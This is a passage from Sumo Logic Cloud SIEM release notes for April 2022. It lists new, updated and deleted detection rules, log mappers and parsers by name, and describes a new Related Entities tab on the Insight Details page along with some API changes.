  • [Deleted] Windows - Security - 4674 - CIP
  • [Deleted] Windows - Security - 4688 - CIP
  • [Deleted] Windows - Security - 4689 - CIP
  • [Deleted] Windows - Security - 4697 - CIP
  • [Deleted] Windows - Security - 4698 - CIP
  • [Deleted] Windows - Security - 4702 - CIP
  • [Deleted] Windows - Security - 4704 - CIP
  • [Deleted] Windows - Security - 4720 - CIP
  • [Deleted] Windows - Security - 4726 - CIP
  • [Deleted] Windows - Security - 4728 - CIP
  • [Deleted] Windows - Security - 4732 - CIP
  • [Deleted] Windows - Security - 4740 - CIP
  • [Deleted] Windows - Security - 4742 - CIP
  • [Deleted] Windows - Security - 4754 - CIP
  • [Deleted] Windows - Security - 4755 - CIP
  • [Deleted] Windows - Security - 4756 - CIP
  • [Deleted] Windows - Security - 4768 - CIP
  • [Deleted] Windows - Security - 4769 - CIP
  • [Deleted] Windows - Security - 4770 - CIP
  • [Deleted] Windows - Security - 4771 - CIP
  • [Deleted] Windows - Security - 4776 - CIP
  • [Deleted] Windows - Security - 4778 - CIP
  • [Deleted] Windows - Security - 4779 - CIP
  • [Deleted] Windows - Security - 4780 - CIP
  • [Deleted] Windows - Security - 4793 - CIP
  • [Deleted] Windows - Security - 4798 - CIP
  • [Deleted] Windows - Security - 4799 - CIP
  • [Deleted] Windows - Security - 5038 - CIP
  • [Deleted] Windows - Security - 5058 - CIP
  • [Deleted] Windows - Security - 5059 - CIP
  • [Deleted] Windows - Security - 5061 - CIP
  • [Deleted] Windows - Security - 5140 - CIP
  • [Deleted] Windows - Security - 5379 - CIP
  • [Deleted] Windows - Security - 5805 - CIP
  • [Deleted] Windows - Security - 6272 - CIP
  • [Deleted] Windows - Security - 6273 - CIP
  • [Deleted] Windows - Security - 6275 - CIP
  • [Deleted] Windows - Security - 6278 - CIP
  • [Deleted] Windows - Security - 6416 - CIP
  • [Deleted] Windows - Security - 6423 - CIP
  • [Deleted] Windows - Security - 6424 - CIP
  • [Deleted] Windows - System - 5138 - CIP
  • [Deleted] Windows - System - 6005 - CIP
  • [Deleted] Windows - System - 6006 - CIP
  • [Deleted] Windows - System - 7045 - CIP
  • [New] BlueCat DNS Parser - Catch All
  • [Updated] AWS WAF Allow Logs
  • [Updated] AWS WAF Block Logs
  • [Updated] Firepower Catch All
  • [Updated] Linux OS Syslog - Process sshd - SSH Auth Failure
  • [Updated] Linux OS Syslog - Process sshd - SSH Auth Failure Invalid Password
  • [Updated] Linux OS Syslog - Process sshd - SSH Auth Failure Invalid User
  • [Updated] Linux OS Syslog - Process sshd - SSH Auth Failure No ID String
  • [Updated] Linux OS Syslog - Process sshd - SSH Auth Failure Preauth
  • [Updated] Linux OS Syslog - Process sshd - SSH Auth Success

Parsers

  • [Deleted] /Parsers/System/BlueCat/BlueCat DHCP Syslog
  • [New] /Parsers/System/BlueCat/BlueCat DHCP-DNS Syslog
  • [New] /Parsers/System/Cisco/Cisco Firepower JSON
  • [Updated] /Parsers/System/AWS/AWS WAF
  • [Updated] /Parsers/System/Zscaler/Zscaler Nanolog Streaming Service/Zscaler Nanolog Streaming Service-JSON

April 29, 2022 - Application Update

[New] The Cloud SIEM team is excited to announce a newly enhanced feature: Related Entities. Although Insights and the Signals they contain are focused on a single Entity (a user, or host for example), there are often a number of additional Entities referenced in the Records/Signals contained in the Insight. In addition, Cloud SIEM can detect relationships between Entities (for example, determining that an IP address was associated with a given hostname during the Insight detection window).

To provide an easy way for analysts to explore all of these Related Entities, a new tab has been added to the Insight Details page:

The **Entities **tab contains a list of all of the Entities detected in the Insight’s Signals and Records. The Primary Entity is listed first, and then the other Related Entities are listed in descending order of appearance. Where Cloud SIEM has determined a relationship between entities, that is called out (for example, 192.168.1.101 may also be hostname ‘na’).

Details listed with each entity include tags, the number of Signals the Entity was seen in, the number of recent Insights and Signals that featured that Entity, and the total sum of the Severities for those Signals.

As each Entity is selected by the user, the right column changes to show more details, such as a link to the full Entity Details page, inventory and other metadata, a Signal timeline, and a list of the recent Signals and Insights (containing links to those individual details pages).

This new feature should help users understand the context of security events more quickly by providing this data at a glance, reducing the amount of time it would have previously taken to gather that same information.

More information can be found in the online documentation.

Minor Changes and Enhancements

[Update] For Signals generated by Threshold, Aggregation and Chain Rules, there is a feature called Queried Records that enables users to find additional records that also apply to the Signal beyond those that were needed to meet the conditions for the Rule.The page that lists these Queried Records now explicitly shows the search query and time window that is being checked. If a user clicks on the query, it will open a Log Search window with the query and time window pre-filled for deeper investigation.

related-entities

April 29, 2022 - Content Release

Rules

  • [Updated] THRESHOLD-S00051 AWS CloudTrail - IAM User Generating AccessDenied Errors Across Multiple Actions
  • [Updated] THRESHOLD-S00093 AWS Route 53 Reconnaissance
  • [Updated] THRESHOLD-S00092 AWS WAF Reconnaissance
  • [Updated] THRESHOLD-S00044 DNS DGA Lookup Behavior - NXDOMAIN Responses
  • [Updated] THRESHOLD-S00088 GCP Audit Reconnaissance Activity
  • [Updated] LEGACY-S00047 High risk file extension download without hostname and referrer
  • [Updated] CHAIN-S00004 Lateral Movement Using the Windows Hidden Admin Share
  • [Updated] MATCH-S00687 Linux Security Tool Usage
  • [Updated] THRESHOLD-S00048 Outbound Traffic to Countries Outside the United States
  • [Updated] THRESHOLD-S00040 Possible DNS over TLS (DoT) Activity
  • [Updated] THRESHOLD-S00031 RDP Brute Force Attempt
  • [Updated] THRESHOLD-S00034 SSH Authentication Failures

Log Mappers

  • [New] BlueCat DHCP Parser - Catch All
  • [New] Microsoft Exchange Catch All
  • [New] Microsoft Exchange HTTP Error
  • [New] Microsoft Exchange IIS
  • [New] Varonis DatAlert - Parser
  • [Updated] Varonis DatAdvantage - CEF

Parsers

  • [New] /Parsers/System/BlueCat/BlueCat DHCP Syslog
  • [New] /Parsers/System/Microsoft/Exchange
  • [New] /Parsers/System/Varonis/Varonis DatAlert Syslog
  • [Updated] /Parsers/System/F5/F5 Syslog

April 26, 2022 - Content Release

Rules

  • [New] MATCH-S00808 Azure - Container Instance Creation/Modification
  • [New] MATCH-S00809 Azure - Container Start
  • [New] MATCH-S00807 Azure - Image Created/Modified
  • [New] MATCH-S00810 Azure - Image Deleted

Log Mappers

  • [New] Darktrace Parser Events
  • [Updated] Zscaler - Nanolog Streaming Service - JSON

Parsers

  • [New] /Parsers/System/Darktrace/Darktrace Syslog
  • [New] /Parsers/System/Zscaler/Zscaler Nanolog Streaming Service/Zscaler Nanolog Streaming Service-JSON

April 20, 2022 - Content Release

Rules

  • [New] MATCH-S00798 Azure - Anonymous Blob Access
  • [New] MATCH-S00805 Azure - Bastion Host Created/Modified
  • [New] MATCH-S00806 Azure - Bastion Host Deleted
  • [New] MATCH-S00795 Azure - Diagnostic Setting Deleted
  • [New] MATCH-S00796 Azure - Diagnostic Setting Modified
  • [New] MATCH-S00797 Azure - Event Hub Deleted
  • [New] THRESHOLD-S00109 Azure - Excessive Key Vault Get Requests
  • [New] MATCH-S00788 Azure - Key Deletion
  • [New] MATCH-S00789 Azure - Key Purged
  • [New] MATCH-S00792 Azure - Key Vault Deleted
  • [New] MATCH-S00787 Azure - Protected Item Deletion Attempt
  • [New] MATCH-S00794 Azure - Secret Backup
  • [New] MATCH-S00791 Azure - Secret Deleted
  • [New] MATCH-S00790 Azure - Secret Purged
  • [New] MATCH-S00800 Azure - Storage Deletion
  • [New] MATCH-S00799 Azure - Storage Modification
  • [New] MATCH-S00803 Azure - Virtual Machine Creation/Modification
  • [New] MATCH-S00804 Azure - Virtual Machine Deleted
  • [New] MATCH-S00801 Azure - Virtual Machine Started
  • [New] MATCH-S00802 Azure - Virtual Machine Stopped
  • [Updated] MATCH-S00246 AWS CloudTrail - GetSecretValue from non Amazon IP
  • [Updated] MATCH-S00494 Backdoor.HTTP.BEACON.[Yelp Request]
  • [Updated] MATCH-S00492 Backdoor.HTTP.GORAT.[SID1]
  • [Updated] LEGACY-S00047 High risk file extension download without hostname and referrer
  • [Updated] MATCH-S00445 Known Ransomware File Extensions

Log Mappers

  • [New] Dropbox - Authentication
  • [New] Dropbox - Catch All
  • [Updated] Azure AuditEvent logs

Parsers

  • [Updated] /Parsers/System/AWS/GuardDuty

April 19, 2022 - Announcement

We will be consolidating Authentication Brute Force Attempt MATCH-S00258 on Tuesday May 10 into the normalized intrusion rule set. For more information on the normalized intrusion rule set, please visit the help page.


April 18, 2022 - Application Update

Minor Changes and Enhancements

  • [New] API endpoints are now available to add or remove a given Signal to/from a given Insight, PUT "/insights/<insightId>/signals" and DELETE "/insights/<insightId>/signals" respectively. (For both endpoints, the request body is a list containing signal ID(s) to add or remove from the insight as the request body, the response is the updated Insight.)
  • [Update] The way Cloud SIEM displays group membership in Active Directory inventory objects is changing. Previously, it was displayed in LDAP form (i.e., cn=groupname,dc=something,dc=domain,dc=com); now it will just show the group name.

Resolved Issues

  • Signal and Insight timestamps in the Cloud SIEM UI were not always displayed in the user’s preferred time zone.

April 15, 2022 - Announcements

  • Because it can now be connected via more standardized TAXII feeds, the integration between Cloud SIEM and Anomali ThreatStream has been deprecated as of April 15, 2022. If you are using this integration, be sure to convert to a TAXII feed. To set up a feed, first follow Anomali’s documentation for Setting up a TAXII feed for ThreatStream then Sumo Logic’s documentation for Integrating Cloud SIEM with a TAXII Feed.
  • The Entity API has been updated to include a new field IsSuppressed. This field replaces IsWhitelisted which has been deprecated as of April 15, 2022. If you were previously using IsWhitelisted please ensure you have switched to the new field.

April 14, 2022 - Content Release

Rules

  • [New] MATCH-S00785 Azure - Blob Container Deletion
  • [New] MATCH-S00786 Azure - SQL Database Export
  • [Updated] MATCH-S00243 Azure - High Risk Sign-In (Aggregate)
  • [Updated] MATCH-S00245 Azure - High Risk Sign-In (Real Time)
  • [Updated] MATCH-S00224 Azure - Risky User State : User Confirmed Compromised
  • [Updated] MATCH-S00250 Azure - Suspicious User Risk State Associated with Login
  • [Updated] LEGACY-S00066 PowerShell Remote Administration
  • [Updated] LEGACY-S00105 Suspicious DC Logon
  • [Updated] THRESHOLD-S00075 Too Many Kerberos Encryption Downgrade SPNs (Kerberoasting)

Log Mappers

  • [Updated] CloudTrail - application-insights.amazonaws.com - ListApplications
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - CreateTrail
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - DeleteTrail
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - StartLogging
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - StopLogging
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - UpdateTrail
  • [Updated] CloudTrail - cognito-idp.amazonaws.com - CreateUserPoolClient
  • [Updated] CloudTrail - controltower.amazonaws.com - CreateManagedAccount
  • [Updated] CloudTrail - ec2.amazonaws.com - AttachInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - AuthorizeSecurityGroupIngress
  • [Updated] CloudTrail - ec2.amazonaws.com - BidEvictedEvent
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateCustomerGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateKeyPair
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateNetworkAcl
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateNetworkAclEntry
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteCustomerGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteKeyPair
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteNetworkAcl
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteNetworkAclEntry
  • [Updated] CloudTrail - ec2.amazonaws.com - DetachInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - ImportKeyPair
  • [Updated] CloudTrail - ec2.amazonaws.com - ReplaceNetworkAclAssociation
  • [Updated] CloudTrail - ec2.amazonaws.com - ReplaceNetworkAclEntry
  • [Updated] CloudTrail - ecr.amazonaws.com - PolicyExecutionEvent
  • [Updated] CloudTrail - elasticfilesystem.amazonaws.com - NewClientConnection
  • [Updated] CloudTrail - iam.amazonaws.com - AttachGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - AttachRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - AttachUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - CreateAccessKey
  • [Updated] CloudTrail - iam.amazonaws.com - CreatePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - CreatePolicyVersion
  • [Updated] CloudTrail - iam.amazonaws.com - CreateUser
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DeletePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteRolePermissionsBoundary
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteUser
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteUserPermissionsBoundary
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DetachGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DetachRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DetachUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - PutGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - PutRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - PutUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - UpdateAssumeRolePolicy
  • [Updated] CloudTrail - kms.amazonaws.com - DisableKey
  • [Updated] CloudTrail - kms.amazonaws.com - RotateKey
  • [Updated] CloudTrail - kms.amazonaws.com - ScheduleKeyDeletion
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteDestination
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteLogGroup
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteLogStream
  • [Updated] CloudTrail - organizations.amazonaws.com - CreateAccountResult
  • [Updated] CloudTrail - s3.amazonaws.com - CreateBucket
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketCors
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketLifecycle
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketPolicy
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketAcl
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketCors
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketLifecycle
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketPolicy
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketReplication
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - RotationStarted
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - RotationSucceeded
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - SecretVersionDeletion
  • [Updated] CloudTrail - signin.amazonaws.com - CheckMfa
  • [Updated] CloudTrail - signin.amazonaws.com - ConsoleLogin
  • [Updated] CloudTrail - signin.amazonaws.com - ExitRole
  • [Updated] CloudTrail - signin.amazonaws.com - RenewRole
  • [Updated] CloudTrail - signin.amazonaws.com - SwitchRole
  • [Updated] CloudTrail - sso.amazonaws.com - Federate
  • [Updated] CloudTrail - sso.amazonaws.com - ListProfilesForApplication
  • [Updated] CloudTrail Default Mapping
  • [Updated] Microsoft Graph AD Reporting API C2C - DirectoryAudits
  • [Updated] Microsoft Graph AD Reporting API C2C - Provisioning
  • [Updated] Microsoft Graph AD Reporting API C2C - Signin
  • [Updated] Trend Micro CEF logs

Parsers

  • [New] /Parsers/System/Trend Micro/Trend Micro Deep Security - CEF

April 12, 2022 - Content Release

Rules

  • [New] MATCH-S00784 Linux Host Entered Promiscuous Mode

Log Mappers

  • [Deleted] AWS VPC Flow Logs - Custom Format 1
  • [Deleted] Adaxes Execute Event
  • [Deleted] Adaxes Modify Event
  • [Deleted] Adaxes Run PowerShell Event
  • [Deleted] Aruba Error Logs
  • [Deleted] Aruba ICMP Logs
  • [Deleted] Aruba LDAP Server Logs
  • [Deleted] Aruba PoniUnwired HTTPD CGID Samples
  • [Deleted] Aruba PoniUnwired HTTPD Core Error Samples
  • [Deleted] Aruba PoniUnwired HTTPD Core Warn Samples
  • [Deleted] Aruba PoniUnwired HTTPD ssl error Samples
  • [Deleted] Aruba PoniUnwired Warn Samples
  • [Deleted] BIND DNS Query
  • [Deleted] BIND DNS Update Zone
  • [Deleted] BIND DNS Update Zone Failed
  • [Deleted] BIOC Credential Access logs
  • [Deleted] BIOC Dropper logs
  • [Deleted] BIOC Evasion Variation 2 logs
  • [Deleted] BIOC Evasion logs
  • [Deleted] BIOC Infiltration logs
  • [Deleted] BIOC Persistence and Execution logs
  • [Deleted] BIOC Privilege logs
  • [Deleted] BIOC Reconnaissance logs
  • [Deleted] BIOC Reconnaissance logs Variation 2
  • [Deleted] BIOC Tampering logs
  • [Deleted] BIOC create and write logs
  • [Deleted] Bandura Domain Logs
  • [Deleted] Bandura Packet Logs
  • [Deleted] Barracuda Proxy
  • [Deleted] Bind DHCP Full
  • [Deleted] Bind DHCP On
  • [Deleted] Bind DHCP Short
  • [Deleted] Bind DNS log 1
  • [Deleted] Bind DNS log 10
  • [Deleted] Bind DNS log 2
  • [Deleted] Bind DNS log 3
  • [Deleted] Bind DNS log 4
  • [Deleted] Bind DNS log 5
  • [Deleted] Bind DNS log 6
  • [Deleted] Bind DNS log 7
  • [Deleted] Bind DNS log 8
  • [Deleted] Bind DNS log 9
  • [Deleted] Bind9 DNS
  • [Deleted] Blue Coat Proxy 2
  • [Deleted] Blue Coat Proxy 4
  • [Deleted] Blue Coat Proxy 5
  • [Deleted] Blue Coat Proxy 6
  • [Deleted] Blue Coat Proxy 7
  • [Deleted] Blue Coat Proxy Logs
  • [Deleted] BlueCat DHCP Bootrequest
  • [Deleted] BlueCat DHCP Decline
  • [Deleted] BlueCat DHCP INFORM Logs
  • [Deleted] BlueCat DHCP Offer Logs
  • [Deleted] BlueCat DHCP Reuse Lease
  • [Deleted] BlueCat DHCP failover
  • [Deleted] BlueCat DNS
  • [Deleted] BlueCat DNS with Key
  • [Deleted] CB Protection
  • [Deleted] CB Protection Username
  • [Deleted] CB Response Server 1
  • [Deleted] CB Response Server 10
  • [Deleted] CB Response Server 11
  • [Deleted] CB Response Server 13
  • [Deleted] CB Response Server 14
  • [Deleted] CB Response Server 15
  • [Deleted] CB Response Server 17
  • [Deleted] CB Response Server 2
  • [Deleted] CB Response Server 20
  • [Deleted] CB Response Server 3
  • [Deleted] CB Response Server 4
  • [Deleted] CB Response Server 5
  • [Deleted] CB Response Server 6
  • [Deleted] CB Response Server 7
  • [Deleted] CB Response Server 9
  • [Deleted] CB Response Severity 1
  • [Deleted] CB Response Severity 2
  • [Deleted] CB Response Severity 3
  • [Deleted] CICSCOFW434002
  • [Deleted] Check Point ACCEPT Grok
  • [Deleted] Check Point DROP
  • [Deleted] Check Point VPN
  • [Deleted] Check Point encrypt/decrypt
  • [Deleted] Check Point key install
  • [Deleted] Cisco ACS FAILED-ATTEMPT
  • [Deleted] Cisco ACS FAILED-AUTHENTICATION
  • [Deleted] Cisco ACS Passed-Authentication
  • [Deleted] Cisco ACS Tacacs-Accounting
  • [Deleted] Cisco ASA 106002
  • [Deleted] Cisco ASA 106012
  • [Deleted] Cisco ASA 106013
  • [Deleted] Cisco ASA 106018
  • [Deleted] Cisco ASA 106022
  • [Deleted] Cisco ASA 113039
  • [Deleted] Cisco ASA 716037
  • [Deleted] Cisco ASA 716038
  • [Deleted] Cisco ASA 716039
  • [Deleted] Cisco ASA 722056
  • [Deleted] Cisco ASA 725012
  • [Deleted] Cisco ASA 725017
  • [Deleted] Cisco ASA 734003
  • [Deleted] Cisco ASA 746012
  • [Deleted] Cisco AnyConnect NAT RULES Logs
  • [Deleted] Cisco Authentication Message 01
  • [Deleted] Cisco Authentication Message 02
  • [Deleted] Cisco Authentication Message 03
  • [Deleted] Cisco Authentication Message 04
  • [Deleted] Cisco Authentication Message 05
  • [Deleted] Cisco Authentication Message 06
  • [Deleted] Cisco Authentication Message 07
  • [Deleted] Cisco Authentication Message 08
  • [Deleted] Cisco Authentication Message 09
  • [Deleted] Cisco Authentication Message 10
  • [Deleted] Cisco Authentication Message 11
  • [Deleted] Cisco Authentication Message 12
  • [Deleted] Cisco Authentication Message 13
  • [Deleted] Cisco Authentication Message 14
  • [Deleted] Cisco Authentication Message 15
  • [Deleted] Cisco IOS Message
  • [Deleted] Cisco IOS Queue Full
  • [Deleted] Cisco Ironport WSA
  • [Deleted] Cisco Ironport WSA NOHD
  • [Deleted] Cisco Ironport WSA NOHD 01
  • [Deleted] Cisco Ironport WSA NOHD 03
  • [Deleted] Cisco Meraki IDS-Alerts
  • [Deleted] Cisco Meraki Security Event
  • [Deleted] Cisco Meraki Security Filtering Disposition Change
  • [Deleted] Cisco Umbrella IP Logs Custom
  • [Deleted] Citrix NetScaler AAA Message
  • [Deleted] Citrix NetScaler API CMD EXECUTED
  • [Deleted] Citrix NetScaler Delinked Message
  • [Deleted] Citrix NetScaler Delinked Message 01
  • [Deleted] Citrix NetScaler TCP Connection Terminated
  • [Deleted] DNS_Additions
  • [Deleted] EPO_THREATS_AV
  • [Deleted] EXABEAM
  • [Deleted] F5 HTTPd Audit
  • [Deleted] F5 SSHD Samples
  • [Deleted] F5 SSL Request
  • [Deleted] Firepower Access Control
  • [Deleted] Firepower Access Control 2
  • [Deleted] Firepower Access Control 3
  • [Deleted] Firepower Access Control 4
  • [Deleted] Firepower Access Control 5
  • [Deleted] Firepower Alerts
  • [Deleted] Forcepoint NEW
  • [Deleted] Huawei SNMP LOGS
  • [Deleted] IBM WebSpheredatadevice error 1
  • [Deleted] IBM WebSpheredatadevice error 2
  • [Deleted] IBM WebSpheredatadevice error 3
  • [Deleted] IBM WebSpheredatadevice error 4
  • [Deleted] IBM WebSpheredatadevice error 5
  • [Deleted] INFOBLOX_DNS_QUERIES LOGS
  • [Deleted] INFOBLOX_DNS_QUERIES LOGS - NIOS
  • [Deleted] Infoblox DHCP Updater 1
  • [Deleted] Infoblox DHCP Updater 2
  • [Deleted] Infoblox DHCP Updater 3
  • [Deleted] Infoblox DHCP Updater 4
  • [Deleted] Infoblox DHCP Updater 5
  • [Deleted] Infoblox DHCPACK RENEW Samples
  • [Deleted] Infoblox DHCPACK v2 Samples
  • [Deleted] Infoblox DHCPDISCOVER Samples
  • [Deleted] Infoblox DHCPDISCOVER Samples 2
  • [Deleted] Infoblox DHCPDISCOVER Unknown network Sample
  • [Deleted] Infoblox DHCPEXPIRE Samples
  • [Deleted] Infoblox DHCPNAK Samples
  • [Deleted] Infoblox DHCPOFFER UID Samples
  • [Deleted] Infoblox DHCPRELEASE Samples
  • [Deleted] Infoblox DNS Request AXRF Ended
  • [Deleted] Infoblox DNS Request AXRF Started
  • [Deleted] Infoblox DNS Response
  • [Deleted] Infoblox DNS Zone Update 1
  • [Deleted] Infoblox DNS Zone Update 2
  • [Deleted] Infoblox DNS Zone Update 3
  • [Deleted] Infoblox DNS Zone Update 4
  • [Deleted] Infoblox DNS Zone Update 5
  • [Deleted] Infoblox DNS Zone Update 6
  • [Deleted] Infoblox Domain Notified
  • [Deleted] Invalid Login
  • [Deleted] IronPort Quarantined MID
  • [Deleted] IronPort Quarantined TO
  • [Deleted] Ironport DCID Message
  • [Deleted] Ironport DKIM
  • [Deleted] Ironport ICID Message
  • [Deleted] Ironport Info IC
  • [Deleted] Ironport Info IC and Msg
  • [Deleted] Ironport Info ISQ or RPC
  • [Deleted] Ironport Info Message
  • [Deleted] Ironport Info Mid Info
  • [Deleted] Ironport WSA SFIMS Protocol 1
  • [Deleted] Ironport WSA SFIMS Protocol 2
  • [Deleted] Ironport WSA SFIMS Protocol 3
  • [Deleted] Ironport WSA SFIMS Protocol 4
  • [Deleted] Ironport Warn Message
  • [Deleted] Ironport Warning Connection Error
  • [Deleted] Ironport Warning Full
  • [Deleted] Ironport Warning Invalid DNS FULL
  • [Deleted] Ironport Warning LIMIT
  • [Deleted] Juniper Flow Reassemble Logs
  • [Deleted] Juniper Session Error Logs
  • [Deleted] LINUX User Auth with Hostname
  • [Deleted] Linux Laravel Activity Logs
  • [Deleted] Linux Laravel Activity Logs 01
  • [Deleted] Linux Laravel Login Logs
  • [Deleted] LinuxServer Audit Logs 01
  • [Deleted] LinuxServer Audit Logs 02
  • [Deleted] LinuxServer Log 1
  • [Deleted] LinuxServer Log 11
  • [Deleted] LinuxServer Log 2
  • [Deleted] LinuxServer Log 3
  • [Deleted] LinuxServer Log 4
  • [Deleted] LinuxServer Log 5
  • [Deleted] LinuxServer Log 6
  • [Deleted] LinuxServer Log 7
  • [Deleted] Mcafee MVISION CASB Log
  • [Deleted] NSM_THREAT_IPS
  • [Deleted] Network Management Logs
  • [Deleted] Oauth Logs
  • [Deleted] Ossec Group Addition Logs
  • [Deleted] Ossec Insecure Connection Logs
  • [Deleted] Ossec Integrity checksum Logs
  • [Deleted] Ossec Root Login Refused Logs
  • [Deleted] Ossec ssh server Logs
  • [Deleted] Palo Alto Traps Analytics
  • [Deleted] Palo Alto Traps Analytics - Cloud
  • [Deleted] Palo Alto Traps Config - Cloud
  • [Deleted] Palo Alto Traps Event
  • [Deleted] Palo Alto Traps Events Updated
  • [Deleted] Palo Alto Traps Misc - Cloud
  • [Deleted] Palo Alto Traps System - Cloud
  • [Deleted] Pulse Secure Endpoint
  • [Deleted] Pulse Secure Logs
  • [Deleted] Renew Logs
  • [Deleted] Shibboleth DUO
  • [Deleted] Shibboleth HTTP Redirect EDU
  • [Deleted] Shibboleth HTTP Redirect Email
  • [Deleted] Shibboleth LDAP
  • [Deleted] Shibboleth LDAP Email
  • [Deleted] Snare AgentHeartBeat Logs
  • [Deleted] Snare Windows DHCP Logs
  • [Deleted] SonicWall Bad FTP Protocol
  • [Deleted] SonicWall Block Dropped Events
  • [Deleted] SonicWall Flood Attack
  • [Deleted] SonicWall IPS
  • [Deleted] SonicWall Port Scan
  • [Deleted] SonicWall URL Filter
  • [Deleted] Successful Login
  • [Deleted] Successful Logins
  • [Deleted] Successful SSH Login
  • [Deleted] Suricata HTTP Logs
  • [Deleted] Suricata LogStash
  • [Deleted] Suricata Logstash Custom
  • [Deleted] Suricata Threat Logs
  • [Deleted] Symantec SEP AntiVirus
  • [Deleted] Symantec SEP Potential Risk Found 01
  • [Deleted] Symantec SEP Potential Risk Found 2
  • [Deleted] Symantec SEP Potential Risk Found 3
  • [Deleted] Symantec SEP SONAR
  • [Deleted] Symantec SEP Security Risk Found
  • [Deleted] Symantec SEP Sonar Detection
  • [Deleted] Symantec SEP USB Drive
  • [Deleted] Tanium S24 Logs
  • [Deleted] VLT Vault Extra
  • [Deleted] VMware Logs 1
  • [Deleted] VMware Logs 2
  • [Deleted] VMware Logs 3
  • [Deleted] VMware Logs 4
  • [Deleted] VMware Logs 5
  • [Deleted] VMware Logs 6
  • [Deleted] VMware Logs 7
  • [Deleted] VMware Logs 8
  • [Deleted] VPN Messages
  • [Deleted] VPN Messages 2
  • [Deleted] VPN Messages 3
  • [Deleted] VPN Messages 4
  • [Deleted] VPN Messages 5
  • [Deleted] WatchGuard flow log
  • [Deleted] WatchGuard flow log 2
  • [Deleted] Windows DHCP
  • [Deleted] Windows Defender Unstructured
  • [Deleted] Windows QUICK FIX
  • [Deleted] Zscaler Firewall Grok
  • [Deleted] cisco17
  • [Deleted] cisco20
  • [Deleted] ePO Threat Event
  • [New] AWS EKS - Custom Parser
  • [New] Azure Storage Analytics
  • [New] Citrix NetScaler - SSL Handshake Success
  • [Updated] Azure Administrative logs
  • [Updated] Azure Write and Delete Logs
  • [Updated] Citrix NetScaler - AAA-LOGIN_FAILED
  • [Updated] Citrix NetScaler - Command Executed
  • [Updated] Citrix NetScaler - SSLVPN-HTTPREQUEST
  • [Updated] Citrix NetScaler - SSLVPN-ICA Events
  • [Updated] Citrix NetScaler - SSLVPN-LOGIN
  • [Updated] Citrix NetScaler - SSLVPN-LOGOUT
  • [Updated] Citrix NetScaler - SSLVPN-TCPCONNSTAT

Parsers

  • [New] /Parsers/System/AWS/AWS EKS
  • [New] /Parsers/System/Microsoft/Azure Storage Analytics
  • [Updated] /Parsers/System/Citrix/Citrix NetScaler Syslog

Legacy Parsers

  • [Deleted] 4624
  • [Deleted] ARUBA_PONIUNWIRED_HTTPD_CGID_SAMPLES
  • [Deleted] ARUBA_PONIUNWIRED_HTTPD_CORE_ERROR_SAMPLES
  • [Deleted] ARUBA_PONIUNWIRED_HTTPD_CORE_WARN_SAMPLES
  • [Deleted] ARUBA_PONIUNWIRED_HTTPD_SSL_ERROR_SAMPLES
  • [Deleted] ARUBA_PONIUNWIRED_WARN_SAMPLES
  • [Deleted] ASA_106002
  • [Deleted] ASA_106013
  • [Deleted] ASA_106018
  • [Deleted] ASA_106022
  • [Deleted] ASA_113039
  • [Deleted] ASA_5_746012
  • [Deleted] ASA_6_106012
  • [Deleted] ASA_716037
  • [Deleted] ASA_716038
  • [Deleted] ASA_716039
  • [Deleted] ASA_722056
  • [Deleted] ASA_7_725012
  • [Deleted] ASA_7_725017
  • [Deleted] ASA_7_734003
  • [Deleted] AWS_VPC_FLOW_CUSTOM_1
  • [Deleted] Adaxes_Execute_Event
  • [Deleted] Adaxes_Modify_Event
  • [Deleted] Adaxes_Run_PowerShell_Event
  • [Deleted] Aruba_Error_Logs
  • [Deleted] Aruba_ICMP_Logs
  • [Deleted] Aruba_LDAP_Server_Logs
  • [Deleted] BANDURA_DOMAIN_LOGS
  • [Deleted] BANDURA_PACKET_LOGS
  • [Deleted] BARRACUDA_PROXY
  • [Deleted] BIND9
